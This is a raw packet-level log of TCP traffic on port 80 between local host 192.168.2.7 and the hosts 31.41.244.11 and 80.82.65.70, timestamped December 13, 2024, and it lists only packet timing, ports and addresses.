Dec 13, 2024 18:53:56.068996906 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.069067001 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.069125891 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.069963932 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.070014000 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.070120096 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.070183039 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.071091890 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.071146965 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.071216106 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.071265936 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.072710037 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.072757959 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.072779894 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.072820902 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.073183060 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.073230982 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.073262930 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.073307991 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.074070930 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.074112892 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.074132919 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.074177980 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.075012922 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.075140953 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.105453014 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:56.105520964 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:56.105710030 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:56.216084003 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.216146946 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.216245890 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.216355085 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.216666937 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.216730118 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.216777086 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.217695951 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.217746019 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.217863083 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.218692064 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.218741894 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.218744993 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.218801022 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.219697952 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.219749928 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.219827890 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.219871044 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.220699072 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.220757961 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.220805883 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.220851898 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.221739054 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.221941948 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.222007990 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.222769022 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.222826958 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.222872972 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.223239899 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.223727942 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.223876953 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.223929882 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.224838018 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.224915981 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.224955082 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.224997044 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.225882053 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.225971937 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.226027012 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.226095915 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:56.226769924 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.226874113 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.226922035 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.227806091 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.227865934 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.227927923 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.227988005 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.228806019 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.228859901 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.228895903 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.228940010 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.229885101 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.229962111 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.230021000 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.230832100 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.230876923 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.230941057 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.230978012 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.231838942 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.231898069 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.231951952 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.232260942 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.232848883 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.232980967 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.233038902 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.233854055 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.233978987 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.234029055 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.234899998 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.234962940 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.235002041 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.235156059 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.235896111 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.235951900 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.236032009 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.236094952 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.236918926 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.237015009 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.237082958 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.237963915 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.238043070 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.238095999 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.238986015 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.239033937 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.239116907 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.239191055 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.239980936 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.240098953 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.240155935 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.240968943 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.241025925 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.241101980 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.241143942 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.241986036 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.242091894 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.242140055 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.243007898 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.243053913 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.243058920 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.243112087 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.244048119 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.244097948 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.244178057 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.244224072 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.245050907 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.245106936 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.245167971 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.245331049 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.246062040 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.246124983 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.246196985 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.247060061 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.247116089 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.247165918 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.247212887 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.248061895 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.248111963 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.248193979 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.248241901 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.249111891 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.249171972 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.249208927 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.249351025 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.250135899 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.250350952 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.250410080 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.251151085 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.251329899 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.251391888 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.252196074 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.252258062 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.252306938 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.253817081 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.253834009 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.253875017 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.253886938 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.254189968 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.254304886 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.254355907 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.255163908 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.255213976 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.255387068 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.256071091 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.256234884 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.256450891 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.257142067 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.257296085 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.257344961 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.257365942 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.257427931 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.258270979 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.258409977 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.258480072 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.261265039 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.261296988 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.261313915 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.261337996 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.261346102 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.261354923 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.261382103 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.261405945 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.261563063 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.261881113 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.262729883 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.262780905 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.262851000 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.262906075 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.263854027 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.263905048 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.264111996 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.264530897 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.264547110 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.264575958 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.264592886 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.265666962 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.265712976 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.265752077 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.265873909 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.266844034 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.266897917 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.266897917 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.266948938 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.267735004 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.267750978 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.267786980 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.267796040 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.268999100 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.269013882 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.269071102 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.269591093 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.269642115 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.408134937 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.408219099 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.408222914 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.408282995 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.408658981 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.408709049 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.408746004 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.408787012 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.409658909 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.409733057 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.409753084 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.409796000 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.410665035 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.410708904 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.410979033 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.411035061 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.411706924 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.411792994 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.411926985 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.412710905 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.412790060 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.412830114 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.412941933 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.413737059 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.413789034 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.413834095 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.413877010 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.414724112 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.414769888 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.414813995 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.414860964 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.415787935 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.415836096 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.415849924 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.415894032 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.416747093 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.416796923 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.416879892 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.416927099 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.417782068 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.417830944 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.417876005 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.418061018 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.418827057 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.418884993 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.418943882 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.418991089 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.419852018 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.419900894 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.419975042 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.420142889 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.420939922 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.420986891 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.421046972 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.421092987 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.421844006 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.421894073 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.421962023 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.422008038 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.422840118 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.422887087 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.422939062 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.422985077 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.423867941 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.423913002 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.423954964 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.424000978 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.424880028 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.424931049 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.424993038 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.425060987 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.425890923 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.425939083 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.426004887 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.426054955 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.426897049 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.426939011 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.426989079 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.427037954 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.427970886 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.428020000 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.428044081 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.428091049 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.428936005 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.428986073 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.429099083 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.429147005 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.430227041 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.430243015 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.430286884 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.430979013 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.431027889 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.431287050 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.431375980 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.432136059 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.432152033 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.432188988 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.432200909 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.433497906 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.433514118 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.433557987 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.434457064 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.434472084 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.434531927 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.435364962 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.435380936 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.435417891 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.436711073 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.436726093 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.436919928 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.437227964 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.437243938 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.437279940 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.437305927 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.438198090 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.438213110 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.438244104 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.438255072 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.439114094 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.439172983 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.439357042 CET	80	49917	31.41.244.11	192.168.2.7
